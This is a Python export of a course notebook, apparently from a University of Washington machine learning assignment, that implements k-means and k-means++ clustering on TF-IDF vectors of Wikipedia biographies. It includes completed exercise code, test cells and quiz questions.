] | 20 | 2017-04-06T08:50:58.000Z | 2021-11-01T13:43:22.000Z | Course-4-Clustering-and-Retrieval/week-3-k-means-with-text-data_blank.py | emetnatbelt/Machine-Learning-Univ-Washington | 6e6f9cd69b69157f5c09eed299ab120bf6764de3 | [
"MIT"
] | null | null | null | Course-4-Clustering-and-Retrieval/week-3-k-means-with-text-data_blank.py | emetnatbelt/Machine-Learning-Univ-Washington | 6e6f9cd69b69157f5c09eed299ab120bf6764de3 | [
"MIT"
] | 24 | 2016-06-01T21:28:17.000Z | 2021-10-02T03:17:11.000Z |
# coding: utf-8
# # k-means with text data
# In this assignment you will
# * Cluster Wikipedia documents using k-means
# * Explore the role of random initialization on the quality of the clustering
# * Explore how results differ after changing the number of clusters
# * Evaluate clustering, both quantitatively and qualitatively
#
# When properly executed, clustering uncovers valuable insights from a set of unlabeled documents.
# **Note to Amazon EC2 users**: To conserve memory, make sure to stop all the other notebooks before running this notebook.
# ## Import necessary packages
# The following code block will check if you have the correct version of GraphLab Create. Any version later than 1.8.5 will do. To upgrade, read [this page](https://turi.com/download/upgrade-graphlab-create.html).
# In[1]:
import os
os.environ["OMP_NUM_THREADS"] = "1"
import graphlab
graphlab.SArray(range(1000)).apply(lambda x: x)
# In[2]:
import matplotlib.pyplot as plt
import numpy as np
import sys
import os
from scipy.sparse import csr_matrix
get_ipython().magic(u'matplotlib inline')
'''Check GraphLab Create version'''
from distutils.version import StrictVersion
assert (StrictVersion(graphlab.version) >= StrictVersion('1.8.5')), 'GraphLab Create must be version 1.8.5 or later.'
# ## Load data, extract features
# To work with text data, we must first convert the documents into numerical features. As in the first assignment, let's extract TF-IDF features for each article.
# In[3]:
wiki = graphlab.SFrame('people_wiki.gl/')
# In[4]:
wiki['tf_idf'] = graphlab.text_analytics.tf_idf(wiki['text'])
# For the remainder of the assignment, we will use sparse matrices. Sparse matrices are matrices that have a small number of nonzero entries. A good data structure for sparse matrices would only store the nonzero entries to save space and speed up computation. SciPy provides a highly-optimized library for sparse matrices. Many matrix operations available for NumPy arrays are also available for SciPy sparse matrices.
#
# We first convert the TF-IDF column (in dictionary format) into the SciPy sparse matrix format. We included plenty of comments for the curious; if you'd like, you may skip the next block and treat the function as a black box.
# In[5]:
def sframe_to_scipy(x, column_name):
'''
Convert a dictionary column of an SFrame into a sparse matrix format where
each (row_id, column_id, value) triple corresponds to the value of
x[row_id][column_id], where column_id is a key in the dictionary.
Example
>>> sparse_matrix, map_key_to_index = sframe_to_scipy(sframe, column_name)
'''
assert x[column_name].dtype() == dict, 'The chosen column must be dict type, representing sparse data.'
# Create triples of (row_id, feature_id, count).
# 1. Add a row number.
x = x.add_row_number()
# 2. Stack will transform x to have a row for each unique (row, key) pair.
x = x.stack(column_name, ['feature', 'value'])
# Map words into integers using a OneHotEncoder feature transformation.
f = graphlab.feature_engineering.OneHotEncoder(features=['feature'])
# 1. Fit the transformer using the above data.
f.fit(x)
# 2. The transform takes 'feature' column and adds a new column 'feature_encoding'.
x = f.transform(x)
# 3. Get the feature mapping.
mapping = f['feature_encoding']
# 4. Get the feature id to use for each key.
x['feature_id'] = x['encoded_features'].dict_keys().apply(lambda x: x[0])
# Create numpy arrays that contain the data for the sparse matrix.
i = np.array(x['id'])
j = np.array(x['feature_id'])
v = np.array(x['value'])
width = x['id'].max() + 1
height = x['feature_id'].max() + 1
# Create a sparse matrix.
mat = csr_matrix((v, (i, j)), shape=(width, height))
return mat, mapping
# In[6]:
# The conversion will take about a minute or two.
tf_idf, map_index_to_word = sframe_to_scipy(wiki, 'tf_idf')
# In[7]:
tf_idf
# The above matrix contains a TF-IDF score for each of the 59071 pages in the data set and each of the 547979 unique words.
# ## Normalize all vectors
# As discussed in the previous assignment, Euclidean distance can be a poor metric of similarity between documents, as it unfairly penalizes long articles. For a reasonable assessment of similarity, we should disregard the length information and use length-agnostic metrics, such as cosine distance.
#
# The k-means algorithm does not directly work with cosine distance, so we take an alternative route to remove length information: we normalize all vectors to be unit length. It turns out that Euclidean distance closely mimics cosine distance when all vectors are unit length. In particular, the squared Euclidean distance between any two vectors of length one is directly proportional to their cosine distance.
#
# We can prove this as follows. Let $\mathbf{x}$ and $\mathbf{y}$ be normalized vectors, i.e. unit vectors, so that $\|\mathbf{x}\|=\|\mathbf{y}\|=1$. Write the squared Euclidean distance as the dot product of $(\mathbf{x} - \mathbf{y})$ to itself:
# \begin{align*}
# \|\mathbf{x} - \mathbf{y}\|^2 &= (\mathbf{x} - \mathbf{y})^T(\mathbf{x} - \mathbf{y})\\
# &= (\mathbf{x}^T \mathbf{x}) - 2(\mathbf{x}^T \mathbf{y}) + (\mathbf{y}^T \mathbf{y})\\
# &= \|\mathbf{x}\|^2 - 2(\mathbf{x}^T \mathbf{y}) + \|\mathbf{y}\|^2\\
# &= 2 - 2(\mathbf{x}^T \mathbf{y})\\
# &= 2(1 - (\mathbf{x}^T \mathbf{y}))\\
# &= 2\left(1 - \frac{\mathbf{x}^T \mathbf{y}}{\|\mathbf{x}\|\|\mathbf{y}\|}\right)\\
# &= 2\left[\text{cosine distance}\right]
# \end{align*}
#
# This tells us that two **unit vectors** that are close in Euclidean distance are also close in cosine distance. Thus, the k-means algorithm (which naturally uses Euclidean distances) on normalized vectors will produce the same results as clustering using cosine distance as a distance metric.
#
# We import the [`normalize()` function](http://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.normalize.html) from scikit-learn to normalize all vectors to unit length.
# In[8]:
from sklearn.preprocessing import normalize
tf_idf = normalize(tf_idf)
# ## Implement k-means
# Let us implement the k-means algorithm. First, we choose an initial set of centroids. A common practice is to choose randomly from the data points.
#
# **Note:** We specify a seed here, so that everyone gets the same answer. In practice, we highly recommend to use different seeds every time (for instance, by using the current timestamp).
# In[9]:
def get_initial_centroids(data, k, seed=None):
'''Randomly choose k data points as initial centroids'''
if seed is not None: # useful for obtaining consistent results
np.random.seed(seed)
n = data.shape[0] # number of data points
# Pick K indices from range [0, N).
rand_indices = np.random.randint(0, n, k)
# Keep centroids as dense format, as many entries will be nonzero due to averaging.
# As long as at least one document in a cluster contains a word,
# it will carry a nonzero weight in the TF-IDF vector of the centroid.
centroids = data[rand_indices,:].toarray()
return centroids
# After initialization, the k-means algorithm iterates between the following two steps:
# 1. Assign each data point to the closest centroid.
# $$
# z_i \gets \mathrm{argmin}_j \|\mu_j - \mathbf{x}_i\|^2
# $$
# 2. Revise centroids as the mean of the assigned data points.
# $$
# \mu_j \gets \frac{1}{n_j}\sum_{i:z_i=j} \mathbf{x}_i
# $$
# In pseudocode, we iteratively do the following:
# ```
# cluster_assignment = assign_clusters(data, centroids)
# centroids = revise_centroids(data, k, cluster_assignment)
# ```
# ### Assigning clusters
# How do we implement Step 1 of the main k-means loop above? First import `pairwise_distances` function from scikit-learn, which calculates Euclidean distances between rows of given arrays. See [this documentation](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise.pairwise_distances.html) for more information.
#
# For the sake of demonstration, let's look at documents 100 through 102 as query documents and compute the distances between each of these documents and every other document in the corpus. In the k-means algorithm, we will have to compute pairwise distances between the set of centroids and the set of documents.
# In[10]:
from sklearn.metrics import pairwise_distances
# Get the TF-IDF vectors for documents 100 through 102.
queries = tf_idf[100:102,:]
# Compute pairwise distances from every data point to each query vector.
dist = pairwise_distances(tf_idf, queries, metric='euclidean')
print dist
# More formally, `dist[i,j]` is assigned the distance between the `i`th row of `X` (i.e., `X[i,:]`) and the `j`th row of `Y` (i.e., `Y[j,:]`).
# **Checkpoint:** For a moment, suppose that we initialize three centroids with the first 3 rows of `tf_idf`. Write code to compute distances from each of the centroids to all data points in `tf_idf`. Then find the distance between row 430 of `tf_idf` and the second centroid and save it to `dist`.
# In[14]:
# Students should write code here
centroids = tf_idf[:3,:]
distances = pairwise_distances(tf_idf, centroids, metric='euclidean')
distances.shape
# In[15]:
dist = distances[430, 1]
# In[16]:
'''Test cell'''
if np.allclose(dist, pairwise_distances(tf_idf[430,:], tf_idf[1,:])):
print('Pass')
else:
print('Check your code again')
# **Checkpoint:** Next, given the pairwise distances, we take the minimum of the distances for each data point. Fittingly, NumPy provides an `argmin` function. See [this documentation](http://docs.scipy.org/doc/numpy-1.10.1/reference/generated/numpy.argmin.html) for details.
#
# Read the documentation and write code to produce a 1D array whose i-th entry indicates the centroid that is the closest to the i-th data point. Use the list of distances from the previous checkpoint and save them as `distances`. The value 0 indicates closeness to the first centroid, 1 indicates closeness to the second centroid, and so forth. Save this array as `closest_cluster`.
#
# **Hint:** the resulting array should be as long as the number of data points.
# In[17]:
# Students should write code here
closest_cluster = np.argmin(distances, axis=1)
# In[18]:
'''Test cell'''
reference = [list(row).index(min(row)) for row in distances]
if np.allclose(closest_cluster, reference):
print('Pass')
else:
print('Check your code again')
# **Checkpoint:** Let's put these steps together. First, initialize three centroids with the first 3 rows of `tf_idf`. Then, compute distances from each of the centroids to all data points in `tf_idf`. Finally, use these distance calculations to compute cluster assignments and assign them to `cluster_assignment`.
# In[19]:
# Students should write code here
centroids = tf_idf[:3,:]
distances = pairwise_distances(tf_idf, centroids, metric='euclidean')
cluster_assignment = np.argmin(distances, axis=1)
# In[20]:
if len(cluster_assignment)==59071 and np.array_equal(np.bincount(cluster_assignment), np.array([23061, 10086, 25924])):
print('Pass') # count number of data points for each cluster
else:
print('Check your code again.')
# Now we are ready to fill in the blanks in this function:
# In[21]:
def assign_clusters(data, centroids):
# Compute distances between each data point and the set of centroids:
# Fill in the blank (RHS only)
distances_from_centroids = pairwise_distances(data, centroids, metric='euclidean')
# Compute cluster assignments for each data point:
# Fill in the blank (RHS only)
cluster_assignment = np.argmin(distances_from_centroids, axis=1)
return cluster_assignment
# **Checkpoint**. For the last time, let us check if Step 1 was implemented correctly. With rows 0, 2, 4, and 6 of `tf_idf` as an initial set of centroids, we assign cluster labels to rows 0, 10, 20, ..., and 90 of `tf_idf`. The resulting cluster labels should be `[0, 1, 1, 0, 0, 2, 0, 2, 2, 1]`.
# In[22]:
if np.allclose(assign_clusters(tf_idf[0:100:10], tf_idf[0:8:2]), np.array([0, 1, 1, 0, 0, 2, 0, 2, 2, 1])):
print('Pass')
else:
print('Check your code again.')
# ### Revising clusters
# Let's turn to Step 2, where we compute the new centroids given the cluster assignments.
# SciPy and NumPy arrays allow for filtering via Boolean masks. For instance, we filter all data points that are assigned to cluster 0 by writing
# ```
# data[cluster_assignment==0,:]
# ```
# To develop intuition about filtering, let's look at a toy example consisting of 3 data points and 2 clusters.
# In[23]:
data = np.array([[1., 2., 0.],
[0., 0., 0.],
[2., 2., 0.]])
centroids = np.array([[0.5, 0.5, 0.],
[0., -0.5, 0.]])
# Let's assign these data points to the closest centroid.
# In[24]:
cluster_assignment = assign_clusters(data, centroids)
print cluster_assignment
# The expression `cluster_assignment==1` gives a list of Booleans that says whether each data point is assigned to cluster 1 or not:
# In[25]:
cluster_assignment==1
# Likewise for cluster 0:
# In[27]:
cluster_assignment==0
# In lieu of indices, we can put in the list of Booleans to pick and choose rows. Only the rows that correspond to a `True` entry will be retained.
#
# First, let's look at the data points (i.e., their values) assigned to cluster 1:
# In[28]:
data[cluster_assignment==1]
# This makes sense since [0 0 0] is closer to [0 -0.5 0] than to [0.5 0.5 0].
#
# Now let's look at the data points assigned to cluster 0:
# In[29]:
data[cluster_assignment==0]
# Again, this makes sense since these values are each closer to [0.5 0.5 0] than to [0 -0.5 0].
#
# Given all the data points in a cluster, it only remains to compute the mean. Use [np.mean()](http://docs.scipy.org/doc/numpy-1.10.0/reference/generated/numpy.mean.html). By default, the function averages all elements in a 2D array. To compute row-wise or column-wise means, add the `axis` argument. See the linked documentation for details.
#
# Use this function to average the data points in cluster 0:
# In[30]:
data[cluster_assignment==0].mean(axis=0)
# We are now ready to complete this function:
# In[31]:
def revise_centroids(data, k, cluster_assignment):
new_centroids = []
for i in xrange(k):
# Select all data points that belong to cluster i. Fill in the blank (RHS only)
member_data_points = data[cluster_assignment == i]
# Compute the mean of the data points. Fill in the blank (RHS only)
centroid = member_data_points.mean(axis=0)
# Convert numpy.matrix type to numpy.ndarray type
centroid = centroid.A1
new_centroids.append(centroid)
new_centroids = np.array(new_centroids)
return new_centroids
# **Checkpoint**. Let's check our Step 2 implementation. Letting rows 0, 10, ..., 90 of `tf_idf` as the data points and the cluster labels `[0, 1, 1, 0, 0, 2, 0, 2, 2, 1]`, we compute the next set of centroids. Each centroid is given by the average of all member data points in corresponding cluster.
# In[32]:
result = revise_centroids(tf_idf[0:100:10], 3, np.array([0, 1, 1, 0, 0, 2, 0, 2, 2, 1]))
if np.allclose(result[0], np.mean(tf_idf[[0,30,40,60]].toarray(), axis=0)) and np.allclose(result[1], np.mean(tf_idf[[10,20,90]].toarray(), axis=0)) and np.allclose(result[2], np.mean(tf_idf[[50,70,80]].toarray(), axis=0)):
print('Pass')
else:
print('Check your code')
# ### Assessing convergence
# How can we tell if the k-means algorithm is converging? We can look at the cluster assignments and see if they stabilize over time. In fact, we'll be running the algorithm until the cluster assignments stop changing at all. To be extra safe, and to assess the clustering performance, we'll be looking at an additional criteria: the sum of all squared distances between data points and centroids. This is defined as
# $$
# J(\mathcal{Z},\mu) = \sum_{j=1}^k \sum_{i:z_i = j} \|\mathbf{x}_i - \mu_j\|^2.
# $$
# The smaller the distances, the more homogeneous the clusters are. In other words, we'd like to have "tight" clusters.
# In[33]:
def compute_heterogeneity(data, k, centroids, cluster_assignment):
heterogeneity = 0.0
for i in xrange(k):
# Select all data points that belong to cluster i. Fill in the blank (RHS only)
member_data_points = data[cluster_assignment==i, :]
if member_data_points.shape[0] > 0: # check if i-th cluster is non-empty
# Compute distances from centroid to data points (RHS only)
distances = pairwise_distances(member_data_points, [centroids[i]], metric='euclidean')
squared_distances = distances**2
heterogeneity += np.sum(squared_distances)
return heterogeneity
# Let's compute the cluster heterogeneity for the 2-cluster example we've been considering based on our current cluster assignments and centroids.
# In[34]:
compute_heterogeneity(data, 2, centroids, cluster_assignment)
# ### Combining into a single function
# Once the two k-means steps have been implemented, as well as our heterogeneity metric we wish to monitor, it is only a matter of putting these functions together to write a k-means algorithm that
#
# * Repeatedly performs Steps 1 and 2
# * Tracks convergence metrics
# * Stops if either no assignment changed or we reach a certain number of iterations.
# In[35]:
# Fill in the blanks
def kmeans(data, k, initial_centroids, maxiter, record_heterogeneity=None, verbose=False):
'''This function runs k-means on given data and initial set of centroids.
maxiter: maximum number of iterations to run.
record_heterogeneity: (optional) a list, to store the history of heterogeneity as function of iterations
if None, do not store the history.
verbose: if True, print how many data points changed their cluster labels in each iteration'''
centroids = initial_centroids[:]
prev_cluster_assignment = None
for itr in xrange(maxiter):
if verbose:
print(itr)
# 1. Make cluster assignments using nearest centroids
# YOUR CODE HERE
cluster_assignment = assign_clusters(data, centroids)
# 2. Compute a new centroid for each of the k clusters, averaging all data points assigned to that cluster.
# YOUR CODE HERE
centroids = revise_centroids(data, k, cluster_assignment)
# Check for convergence: if none of the assignments changed, stop
if prev_cluster_assignment is not None and (prev_cluster_assignment==cluster_assignment).all():
break
# Print number of new assignments
if prev_cluster_assignment is not None:
num_changed = np.sum(prev_cluster_assignment!=cluster_assignment)
if verbose:
print(' {0:5d} elements changed their cluster assignment.'.format(num_changed))
# Record heterogeneity convergence metric
if record_heterogeneity is not None:
# YOUR CODE HERE
score = compute_heterogeneity(data, k, centroids, cluster_assignment)
record_heterogeneity.append(score)
prev_cluster_assignment = cluster_assignment[:]
return centroids, cluster_assignment
# ## Plotting convergence metric
# We can use the above function to plot the convergence metric across iterations.
# In[36]:
def plot_heterogeneity(heterogeneity, k):
plt.figure(figsize=(7,4))
plt.plot(heterogeneity, linewidth=4)
plt.xlabel('# Iterations')
plt.ylabel('Heterogeneity')
plt.title('Heterogeneity of clustering over time, K={0:d}'.format(k))
plt.rcParams.update({'font.size': 16})
plt.tight_layout()
# Let's consider running k-means with K=3 clusters for a maximum of 400 iterations, recording cluster heterogeneity at every step. Then, let's plot the heterogeneity over iterations using the plotting function above.
# In[37]:
k = 3
heterogeneity = []
initial_centroids = get_initial_centroids(tf_idf, k, seed=0)
centroids, cluster_assignment = kmeans(tf_idf, k, initial_centroids, maxiter=400,
record_heterogeneity=heterogeneity, verbose=True)
plot_heterogeneity(heterogeneity, k)
# **Quiz Question**. (True/False) The clustering objective (heterogeneity) is non-increasing for this example.
# **Quiz Question**. Let's step back from this particular example. If the clustering objective (heterogeneity) would ever increase when running k-means, that would indicate: (choose one)
#
# 1. k-means algorithm got stuck in a bad local minimum
# 2. There is a bug in the k-means code
# 3. All data points consist of exact duplicates
# 4. Nothing is wrong. The objective should generally go down sooner or later.
# **Quiz Question**. Which of the cluster contains the greatest number of data points in the end? Hint: Use [`np.bincount()`](http://docs.scipy.org/doc/numpy-1.11.0/reference/generated/numpy.bincount.html) to count occurrences of each cluster label.
# 1. Cluster #0
# 2. Cluster #1
# 3. Cluster #2
# In[38]:
np.bincount(cluster_assignment)
# ## Beware of local maxima
# One weakness of k-means is that it tends to get stuck in a local minimum. To see this, let us run k-means multiple times, with different initial centroids created using different random seeds.
#
# **Note:** Again, in practice, you should set different seeds for every run. We give you a list of seeds for this assignment so that everyone gets the same answer.
#
# This may take several minutes to run.
# In[40]:
k = 10
heterogeneity = {}
import time
start = time.time()
for seed in [0, 20000, 40000, 60000, 80000, 100000, 120000]:
initial_centroids = get_initial_centroids(tf_idf, k, seed)
centroids, cluster_assignment = kmeans(tf_idf, k, initial_centroids, maxiter=400,
record_heterogeneity=None, verbose=False)
# To save time, compute heterogeneity only once in the end
heterogeneity[seed] = compute_heterogeneity(tf_idf, k, centroids, cluster_assignment)
# New line for quiz question
print('seed={0:06d}, heterogeneity={1:.5f}, max cluster size={2}'.format(seed, heterogeneity[seed], max(np.bincount(cluster_assignment))))
sys.stdout.flush()
end = time.time()
print(end-start)
# Notice the variation in heterogeneity for different initializations. This indicates that k-means sometimes gets stuck at a bad local minimum.
# **Quiz Question**. Another way to capture the effect of changing initialization is to look at the distribution of cluster assignments. Add a line to the code above to compute the size (# of member data points) of clusters for each run of k-means. Look at the size of the largest cluster (most # of member data points) across multiple runs, with seeds 0, 20000, ..., 120000. How much does this measure vary across the runs? What is the minimum and maximum values this quantity takes?
# One effective way to counter this tendency is to use **k-means++** to provide a smart initialization. This method tries to spread out the initial set of centroids so that they are not too close together. It is known to improve the quality of local optima and lower average runtime.
# In[41]:
def smart_initialize(data, k, seed=None):
'''Use k-means++ to initialize a good set of centroids'''
if seed is not None: # useful for obtaining consistent results
np.random.seed(seed)
centroids = np.zeros((k, data.shape[1]))
# Randomly choose the first centroid.
# Since we have no prior knowledge, choose uniformly at random
idx = np.random.randint(data.shape[0])
centroids[0] = data[idx,:].toarray()
# Compute distances from the first centroid chosen to all the other data points
squared_distances = pairwise_distances(data, centroids[0:1], metric='euclidean').flatten()**2
for i in xrange(1, k):
# Choose the next centroid randomly, so that the probability for each data point to be chosen
# is directly proportional to its squared distance from the nearest centroid.
# Roughtly speaking, a new centroid should be as far as from ohter centroids as possible.
idx = np.random.choice(data.shape[0], 1, p=squared_distances/sum(squared_distances))
centroids[i] = data[idx,:].toarray()
# Now compute distances from the centroids to all data points
squared_distances = np.min(pairwise_distances(data, centroids[0:i+1], metric='euclidean')**2,axis=1)
return centroids
# Let's now rerun k-means with 10 clusters using the same set of seeds, but always using k-means++ to initialize the algorithm.
#
# This may take several minutes to run.
# In[42]:
k = 10
heterogeneity_smart = {}
start = time.time()
for seed in [0, 20000, 40000, 60000, 80000, 100000, 120000]:
initial_centroids = smart_initialize(tf_idf, k, seed)
centroids, cluster_assignment = kmeans(tf_idf, k, initial_centroids, maxiter=400,
record_heterogeneity=None, verbose=False)
# To save time, compute heterogeneity only once in the end
heterogeneity_smart[seed] = compute_heterogeneity(tf_idf, k, centroids, cluster_assignment)
print('seed={0:06d}, heterogeneity={1:.5f}'.format(seed, heterogeneity_smart[seed]))
sys.stdout.flush()
end = time.time()
print(end-start)
# Let's compare the set of cluster heterogeneities we got from our 7 restarts of k-means using random initialization compared to the 7 restarts of k-means using k-means++ as a smart initialization.
#
# The following code produces a [box plot](http://matplotlib.org/api/pyplot_api.html) for each of these methods, indicating the spread of values produced by each method.
# In[43]:
plt.figure(figsize=(8,5))
plt.boxplot([heterogeneity.values(), heterogeneity_smart.values()], vert=False)
plt.yticks([1, 2], ['k-means', 'k-means++'])
plt.rcParams.update({'font.size': 16})
plt.tight_layout()
# A few things to notice from the box plot:
# * On average, k-means++ produces a better clustering than Random initialization.
# * Variation in clustering quality is smaller for k-means++.
# **In general, you should run k-means at least a few times with different initializations and then return the run resulting in the lowest heterogeneity.** Let us write a function that runs k-means multiple times and picks the best run that minimizes heterogeneity. The function accepts an optional list of seed values to be used for the multiple runs; if no such list is provided, the current UTC time is used as seed values.
# In[44]:
def kmeans_multiple_runs(data, k, maxiter, num_runs, seed_list=None, verbose=False):
heterogeneity = {}
min_heterogeneity_achieved = float('inf')
best_seed = None
final_centroids = None
final_cluster_assignment = None
for i in xrange(num_runs):
# Use UTC time if no seeds are provided
if seed_list is not None:
seed = seed_list[i]
np.random.seed(seed)
else:
seed = int(time.time())
np.random.seed(seed)
# Use k-means++ initialization
# YOUR CODE HERE
initial_centroids = smart_initialize(data, k, seed)
# Run k-means
# YOUR CODE HERE
centroids, cluster_assignment = kmeans(data, k, initial_centroids, maxiter, record_heterogeneity=None, verbose=False)
# To save time, compute heterogeneity only once in the end
# YOUR CODE HERE
heterogeneity[seed] = compute_heterogeneity(data, k, centroids, cluster_assignment)
if verbose:
print('seed={0:06d}, heterogeneity={1:.5f}'.format(seed, heterogeneity[seed]))
sys.stdout.flush()
# if current measurement of heterogeneity is lower than previously seen,
# update the minimum record of heterogeneity.
if heterogeneity[seed] < min_heterogeneity_achieved:
min_heterogeneity_achieved = heterogeneity[seed]
best_seed = seed
final_centroids = centroids
final_cluster_assignment = cluster_assignment
# Return the centroids and cluster assignments that minimize heterogeneity.
return final_centroids, final_cluster_assignment
# ## How to choose K
# Since we are measuring the tightness of the clusters, a higher value of K reduces the possible heterogeneity metric by definition. For example, if we have N data points and set K=N clusters, then we could have 0 cluster heterogeneity by setting the N centroids equal to the values of the N data points. (Note: Not all runs for larger K will result in lower heterogeneity than a single run with smaller K due to local optima.) Let's explore this general trend for ourselves by performing the following analysis.
# Use the `kmeans_multiple_runs` function to run k-means with five different values of K. For each K, use k-means++ and multiple runs to pick the best solution. In what follows, we consider K=2,10,25,50,100 and 7 restarts for each setting.
#
# **IMPORTANT: The code block below will take about one hour to finish. We highly suggest that you use the arrays that we have computed for you.**
#
# Side note: In practice, a good implementation of k-means would utilize parallelism to run multiple runs of k-means at once. For an example, see [scikit-learn's KMeans](http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html).
# In[ ]:
#def plot_k_vs_heterogeneity(k_values, heterogeneity_values):
# plt.figure(figsize=(7,4))
# plt.plot(k_values, heterogeneity_values, linewidth=4)
# plt.xlabel('K')
# plt.ylabel('Heterogeneity')
# plt.title('K vs. Heterogeneity')
# plt.rcParams.update({'font.size': 16})
# plt.tight_layout()
#start = time.time()
#centroids = {}
#cluster_assignment = {}
#heterogeneity_values = []
#k_list = [2, 10, 25, 50, 100]
#seed_list = [0, 20000, 40000, 60000, 80000, 100000, 120000]
#for k in k_list:
# heterogeneity = []
# centroids[k], cluster_assignment[k] = kmeans_multiple_runs(tf_idf, k, maxiter=400,
# num_runs=len(seed_list),
# seed_list=seed_list,
# verbose=True)
# score = compute_heterogeneity(tf_idf, k, centroids[k], cluster_assignment[k])
# heterogeneity_values.append(score)
#plot_k_vs_heterogeneity(k_list, heterogeneity_values)
#end = time.time()
#print(end-start)
# To use the pre-computed NumPy arrays, first download kmeans-arrays.npz as mentioned in the reading for this assignment and load them with the following code. Make sure the downloaded file is in the same directory as this notebook.
# In[45]:
def plot_k_vs_heterogeneity(k_values, heterogeneity_values):
plt.figure(figsize=(7,4))
plt.plot(k_values, heterogeneity_values, linewidth=4)
plt.xlabel('K')
plt.ylabel('Heterogeneity')
plt.title('K vs. Heterogeneity')
plt.rcParams.update({'font.size': 16})
plt.tight_layout()
filename = 'kmeans-arrays.npz'
heterogeneity_values = []
k_list = [2, 10, 25, 50, 100]
if os.path.exists(filename):
arrays = np.load(filename)
centroids = {}
cluster_assignment = {}
for k in k_list:
print k
sys.stdout.flush()
'''To save memory space, do not load the arrays from the file right away. We use
a technique known as lazy evaluation, where some expressions are not evaluated
until later. Any expression appearing inside a lambda function doesn't get
evaluated until the function is called.
Lazy evaluation is extremely important in memory-constrained setting, such as
an Amazon EC2 t2.micro instance.'''
centroids[k] = lambda k=k: arrays['centroids_{0:d}'.format(k)]
cluster_assignment[k] = lambda k=k: arrays['cluster_assignment_{0:d}'.format(k)]
score = compute_heterogeneity(tf_idf, k, centroids[k](), cluster_assignment[k]())
heterogeneity_values.append(score)
plot_k_vs_heterogeneity(k_list, heterogeneity_values)
else:
print('File not found. Skipping.')
# In the above plot we show that heterogeneity goes down as we increase the number of clusters. Does this mean we should always favor a higher K? **Not at all!** As we will see in the following section, setting K too high may end up separating data points that are actually pretty alike. At the extreme, we can set individual data points to be their own clusters (K=N) and achieve zero heterogeneity, but separating each data point into its own cluster is hardly a desirable outcome. In the following section, we will learn how to detect a K set "too large".
# ## Visualize clusters of documents
# Let's start visualizing some clustering results to see if we think the clustering makes sense. We can use such visualizations to help us assess whether we have set K too large or too small for a given application. Following the theme of this course, we will judge whether the clustering makes sense in the context of document analysis.
#
# What are we looking for in a good clustering of documents?
# * Documents in the same cluster should be similar.
# * Documents from different clusters should be less similar.
#
# So a bad clustering exhibits either of two symptoms:
# * Documents in a cluster have mixed content.
# * Documents with similar content are divided up and put into different clusters.
#
# To help visualize the clustering, we do the following:
# * Fetch nearest neighbors of each centroid from the set of documents assigned to that cluster. We will consider these documents as being representative of the cluster.
# * Print titles and first sentences of those nearest neighbors.
# * Print top 5 words that have highest tf-idf weights in each centroid.
# In[46]:
def visualize_document_clusters(wiki, tf_idf, centroids, cluster_assignment, k, map_index_to_word, display_content=True):
'''wiki: original dataframe
tf_idf: data matrix, sparse matrix format
map_index_to_word: SFrame specifying the mapping betweeen words and column indices
display_content: if True, display 8 nearest neighbors of each centroid'''
print('==========================================================')
# Visualize each cluster c
for c in xrange(k):
# Cluster heading
print('Cluster {0:d} '.format(c)),
# Print top 5 words with largest TF-IDF weights in the cluster
idx = centroids[c].argsort()[::-1]
for i in xrange(5): # Print each word along with the TF-IDF weight
print('{0:s}:{1:.3f}'.format(map_index_to_word['category'][idx[i]], centroids[c,idx[i]])),
print('')
if display_content:
# Compute distances from the centroid to all data points in the cluster,
# and compute nearest neighbors of the centroids within the cluster.
distances = pairwise_distances(tf_idf, centroids[c].reshape(1, -1), metric='euclidean').flatten()
distances[cluster_assignment!=c] = float('inf') # remove non-members from consideration
nearest_neighbors = distances.argsort()
# For 8 nearest neighbors, print the title as well as first 180 characters of text.
# Wrap the text at 80-character mark.
for i in xrange(8):
text = ' '.join(wiki[nearest_neighbors[i]]['text'].split(None, 25)[0:25])
print('\n* {0:50s} {1:.5f}\n {2:s}\n {3:s}'.format(wiki[nearest_neighbors[i]]['name'],
distances[nearest_neighbors[i]], text[:90], text[90:180] if len(text) > 90 else ''))
print('==========================================================')
# Let us first look at the 2 cluster case (K=2).
# In[48]:
'''Notice the extra pairs of parentheses for centroids and cluster_assignment.
The centroid and cluster_assignment are still inside the npz file,
and we need to explicitly indicate when to load them into memory.'''
visualize_document_clusters(wiki, tf_idf, centroids[2](), cluster_assignment[2](), 2, map_index_to_word)
# Both clusters have mixed content, although cluster 1 is much purer than cluster 0:
# * Cluster 0: artists, songwriters, professors, politicians, writers, etc.
# * Cluster 1: baseball players, hockey players, soccer (association football) players, etc.
#
# Top words of cluster 1 are all related to sports, whereas top words of cluster 0 show no clear pattern.
#
# Roughly speaking, the entire dataset was divided into athletes and non-athletes. It would be better if we sub-divided non-atheletes into more categories. So let us use more clusters. How about `K=10`?
# In[49]:
k = 10
visualize_document_clusters(wiki, tf_idf, centroids[k](), cluster_assignment[k](), k, map_index_to_word)
# Clusters 0, 1, and 5 appear to be still mixed, but others are quite consistent in content.
# * Cluster 0: artists, actors, film directors, playwrights
# * Cluster 1: soccer (association football) players, rugby players
# * Cluster 2: track and field athletes
# * Cluster 3: baseball players
# * Cluster 4: professors, researchers, scholars
# * Cluster 5: Austrailian rules football players, American football players
# * Cluster 6: female figures from various fields
# * Cluster 7: composers, songwriters, singers, music producers
# * Cluster 8: ice hockey players
# * Cluster 9: politicians
#
# Clusters are now more pure, but some are qualitatively "bigger" than others. For instance, the category of scholars is more general than the category of baseball players. Increasing the number of clusters may split larger clusters. Another way to look at the size of the clusters is to count the number of articles in each cluster.
# In[50]:
np.bincount(cluster_assignment[10]())
# **Quiz Question**. Which of the 10 clusters above contains the greatest number of articles?
#
# 1. Cluster 0: artists, actors, film directors, playwrights
# 2. Cluster 4: professors, researchers, scholars
# 3. Cluster 5: Austrailian rules football players, American football players
# 4. Cluster 7: composers, songwriters, singers, music producers
# 5. Cluster 9: politicians
# **Quiz Question**. Which of the 10 clusters contains the least number of articles?
#
# 1. Cluster 1: soccer (association football) players, rugby players
# 2. Cluster 3: baseball players
# 3. Cluster 6: female figures from various fields
# 4. Cluster 7: composers, songwriters, singers, music producers
# 5. Cluster 8: ice hockey players
# There appears to be at least some connection between the topical consistency of a cluster and the number of its member data points.
# Let us visualize the case for K=25. For the sake of brevity, we do not print the content of documents. It turns out that the top words with highest TF-IDF weights in each cluster are representative of the cluster.
# In[51]:
visualize_document_clusters(wiki, tf_idf, centroids[25](), cluster_assignment[25](), 25,
map_index_to_word, display_content=False) # turn off text for brevity
